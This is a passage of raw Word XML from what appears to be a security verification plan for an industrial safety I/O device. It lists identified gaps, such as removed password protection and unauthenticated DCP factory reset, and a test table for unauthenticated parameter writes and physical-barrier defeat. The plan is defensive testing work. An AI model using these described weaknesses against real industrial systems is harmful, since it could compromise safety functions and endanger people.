    <w:p w14:paraId="07DE5A68" w14:textId="0E6CBAEF" w:rsidR="00AD4AB2" w:rsidRPr="00AD4AB2" w:rsidRDefault="00AD4AB2" w:rsidP="00AD4AB2">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4AB2">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Parameter writes only via fieldbus/PLC engineering tool (SRIO-1983).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783EFB2E" w14:textId="00164991" w:rsidR="00AD4AB2" w:rsidRPr="00AD4AB2" w:rsidRDefault="00AD4AB2" w:rsidP="00AD4AB2">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4AB2">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>F-address/update-mode change needs physical switch + power-cycle (SRIO-10812, SRIO-2013).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233704C8" w14:textId="0D3B0642" w:rsidR="00AD4AB2" w:rsidRPr="00AD4AB2" w:rsidRDefault="00AD4AB2" w:rsidP="00AD4AB2">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4AB2">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FW update accepted only in Update state (SRIO-11534) the mode gate (</w:t>
      </w:r>
      <w:r w:rsidR="00855543" w:rsidRPr="00AD4AB2">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>authorization</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4AB2">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> limb of RQ-005).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712E39A8" w14:textId="73371EA0" w:rsidR="00AD4AB2" w:rsidRPr="0019326C" w:rsidRDefault="00AD4AB2" w:rsidP="00AD4AB2">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4AB2">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Config write blocked after param-end (SRIO-7749).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2495E2" w14:textId="77777777" w:rsidR="002D538B" w:rsidRPr="002D538B" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Identified Gap: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415E4540" w14:textId="6D7F8E41" w:rsidR="00CD5DFC" w:rsidRPr="00CD5DFC" w:rsidRDefault="00CD5DFC" w:rsidP="00CD5DFC">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD5DFC">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>G-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">1: </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD5DFC">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Password protection was deliberately removed (SRIO-8299), so authorization for safety-parameter writes over the fieldbus is fully delegated to the environment (locked cabinet SRIO-9402), a CCSC-2 compensating control that is documented but NOT device-enforced. CR 1.1/1.2/2.1 are met only at system level, not component level.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A783BF0" w14:textId="126E8F89" w:rsidR="00CD5DFC" w:rsidRDefault="00CD5DFC" w:rsidP="00CD5DFC">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD5DFC">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>G-2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD5DFC">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> DCP ‘Reset to Factory’ (Mode 2 mandatory) resets communication parameters; SRIO-7772/3030 describe modes, not authentication, and SRIO-3029 states an IO-Controller/engineering system ‘can change IP parameters or the NameOfStation at any time.’ Impact is BOUNDED: DCP reset hits communication parameters (→ passivation), not silent safety-iPar modification. Confirmed by Test 2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E36960" w14:textId="5BF8217A" w:rsidR="003C1BAD" w:rsidRDefault="00CD04C7" w:rsidP="00DB1578">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00157A42">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>G-</w:t>
      </w:r>
      <w:r w:rsidR="0019790D" w:rsidRPr="00157A42">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00FB06A8" w:rsidRPr="00157A42">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00157A42">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Whether the switch can be moved without visible seal damage</w:t>
      </w:r>
      <w:r w:rsidR="006F2199" w:rsidRPr="00157A42">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00157A42">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the authorization barrier's silent-defeat question </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20300215" w14:textId="77777777" w:rsidR="00157A42" w:rsidRDefault="00157A42" w:rsidP="00157A42">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07F73D8B" w14:textId="77777777" w:rsidR="00157A42" w:rsidRPr="00157A42" w:rsidRDefault="00157A42" w:rsidP="00157A42">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="080D2589" w14:textId="77777777" w:rsidR="00157A42" w:rsidRDefault="00157A42" w:rsidP="00DB1578">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="085C89BE" w14:textId="77777777" w:rsidR="00157A42" w:rsidRDefault="00157A42" w:rsidP="00DB1578">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CA92159" w14:textId="77777777" w:rsidR="00157A42" w:rsidRDefault="00157A42" w:rsidP="00DB1578">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62691378" w14:textId="77777777" w:rsidR="00157A42" w:rsidRDefault="00157A42" w:rsidP="00DB1578">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D30C31A" w14:textId="77777777" w:rsidR="00157A42" w:rsidRDefault="00157A42" w:rsidP="00DB1578">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="424EDCA5" w14:textId="77777777" w:rsidR="00157A42" w:rsidRDefault="00157A42" w:rsidP="00DB1578">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75CC466A" w14:textId="77777777" w:rsidR="00157A42" w:rsidRDefault="00157A42" w:rsidP="00DB1578">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4446333F" w14:textId="77777777" w:rsidR="00157A42" w:rsidRDefault="00157A42" w:rsidP="00DB1578">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AD7D734" w14:textId="77777777" w:rsidR="00157A42" w:rsidRDefault="00157A42" w:rsidP="00DB1578">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76982D19" w14:textId="77777777" w:rsidR="00157A42" w:rsidRDefault="00157A42" w:rsidP="00DB1578">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="727E4567" w14:textId="77777777" w:rsidR="00157A42" w:rsidRDefault="00157A42" w:rsidP="00DB1578">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46BD3D70" w14:textId="77777777" w:rsidR="00157A42" w:rsidRDefault="00157A42" w:rsidP="00DB1578">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C6FDB8D" w14:textId="77777777" w:rsidR="003C1BAD" w:rsidRPr="00DA402C" w:rsidRDefault="003C1BAD" w:rsidP="00DB1578">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69DB0B6E"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25E9D906"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28DBC0C" w14:textId="77777777" w:rsidR="00900880" w:rsidRDefault="00900880" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7273F365"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654D5E21"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6420FC51"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607C9195"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8C448C" w14:paraId="444F667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377122" w14:textId="77777777" w:rsidR="00900880" w:rsidRDefault="00900880" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="44FBD06F" w14:textId="78A2876F" w:rsidR="00900880" w:rsidRPr="004E5BBA" w:rsidRDefault="0085306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E5BBA">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Confirm the IoT-Core write-path is blocked (attempt parameter writes via IoT-Core; expect read-only)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3104703D" w14:textId="1A0E7A50" w:rsidR="00084BCB" w:rsidRPr="004E5BBA"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E5BBA">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Positive verification; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B781D2D" w14:textId="466BCF81" w:rsidR="00900880" w:rsidRPr="004E5BBA"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E5BBA">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>CR 2.1 read-only design</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="215711AA" w14:textId="77777777" w:rsidR="004E5BBA" w:rsidRPr="004E5BBA"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E5BBA">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Requirements-based; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A03FB93" w14:textId="3530847A" w:rsidR="00900880" w:rsidRPr="004E5BBA"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E5BBA">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>OWASP ISTG-DES-AUTHZ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43901DF9" w14:textId="77777777" w:rsidR="00900880" w:rsidRPr="004E5BBA"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E5BBA">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV-1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25D70108" w14:textId="7E66AF66" w:rsidR="001C6987" w:rsidRPr="004E5BBA"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EB5FB4" w14:paraId="5A29851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51A1BC0" w14:textId="77777777" w:rsidR="00900880" w:rsidRDefault="00900880" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="45A763A6" w14:textId="29EF6989" w:rsidR="00900880" w:rsidRPr="00B30CBD" w:rsidRDefault="002811CA"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11CA">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>DCP factory-reset without authentication from a peer node (Mode 2, then 3/4 if present); observe unauthenticated reset of com-config</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41A6BB69" w14:textId="60B0729A" w:rsidR="00900880" w:rsidRPr="00B30CBD" w:rsidRDefault="001255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30CBD">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Proves/refutes G-2 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34707866" w14:textId="2EE2BF98" w:rsidR="00900880" w:rsidRPr="00FF64C1" w:rsidRDefault="00FD271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F64C1">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>MITRE T0836 Modify Parameter; OWASP ISTG-DES-AUTHZ-001; NIST SP 800-115 §5.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59C79EF2" w14:textId="3812D740" w:rsidR="00900880" w:rsidRPr="00FF64C1"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F64C1">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV-4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00900880" w:rsidRPr="008C51F4" w14:paraId="1BA838E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E41276" w14:textId="77777777" w:rsidR="00900880" w:rsidRDefault="00900880" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22E66D26" w14:textId="77777777" w:rsidR="00AA1156" w:rsidRPr="00AA1156"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A1156">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Fieldbus parameter write without device authentication: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07A6D99D" w14:textId="77777777" w:rsidR="00AA1156" w:rsidRPr="00AA1156"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A1156">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">from </w:t>
            </w:r>
            <w:r w:rsidR="00AA1156" w:rsidRPr="00AA1156">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>not a</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA1156">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> legitimate PLC, attempt an acyclic write of safety iPars during the param phase; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19A4EE72" w14:textId="7CF61594" w:rsidR="00900880" w:rsidRPr="00AA1156"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A1156">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>observe whether any credential is demanded</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="675C3A04" w14:textId="26F6FF7A" w:rsidR="00900880" w:rsidRPr="00AA1156" w:rsidRDefault="00E43E8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A1156">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Proves G-1 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="582AAAE8" w14:textId="54A66060" w:rsidR="00900880" w:rsidRPr="00AC5613" w:rsidRDefault="001350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C5613">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>MITRE T0843/T0836; NIST SP 800-115 §5.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77EB5EFE" w14:textId="5A894C71" w:rsidR="00900880" w:rsidRPr="00AC5613"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C5613">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV-4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00900880" w:rsidRPr="006028AC" w14:paraId="3BE3C202"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F9AB3EE" w14:textId="77777777" w:rsidR="00900880" w:rsidRDefault="00900880" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0CF5810A" w14:textId="7B8CD125" w:rsidR="00900880" w:rsidRPr="00AC70A9" w:rsidRDefault="006028A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C70A9">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Firmware-update access gate (from RQ-005): attempt update outside Update state; confirm rejection; then in Update state confirm acceptance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41640C5D" w14:textId="4B2FFBAE" w:rsidR="00900880" w:rsidRPr="00AC70A9" w:rsidRDefault="00BE381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C70A9">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Validates the authorization gate (EDR 3.10),  bounds G-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78AF7827" w14:textId="77777777" w:rsidR="00AC70A9" w:rsidRPr="00AC70A9"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C70A9">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">OWASP ISTG-FW[UPDT]-AUTHZ-001; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="363B1A50" w14:textId="0AD7178F" w:rsidR="00900880" w:rsidRPr="00AC70A9"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C70A9">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>NIST SP 800-115 §5.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="146D3054" w14:textId="46E339B6" w:rsidR="00900880" w:rsidRPr="00AC70A9"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C70A9">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV-2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00900880" w:rsidRPr="005842EE" w14:paraId="06D0F10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B96A91C" w14:textId="77777777" w:rsidR="00900880" w:rsidRDefault="00900880" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FE77C04" w14:textId="77777777" w:rsidR="0019790D"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9790D">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Physical-barrier silent defeat</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DE25D9B" w14:textId="139D2D81" w:rsidR="00900880" w:rsidRPr="002539A8"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9790D">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>REUSE TC-RQ003-03 / TC-RQ002-05 by reference</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="002DD343" w14:textId="52317642" w:rsidR="00900880" w:rsidRPr="002539A8" w:rsidRDefault="003C74B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539A8">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Proves G-</w:t>
            </w:r>
            <w:r w:rsidR="0019790D">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A4B896C" w14:textId="77777777" w:rsidR="002539A8" w:rsidRPr="002539A8"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539A8">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">OWASP ISTG-PHY; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="790E5D8B" w14:textId="1C080243" w:rsidR="00900880" w:rsidRPr="002539A8"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539A8">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>EDR 3.11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3727A425" w14:textId="471D215A" w:rsidR="00900880" w:rsidRPr="002539A8" w:rsidRDefault="00D13AE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539A8">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">SVV-4 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="13525B3F" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59834305" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BAF0D6E" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRPr="00DB074F" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB074F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB074F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Two-Level Test Catalog</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E19ED45" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
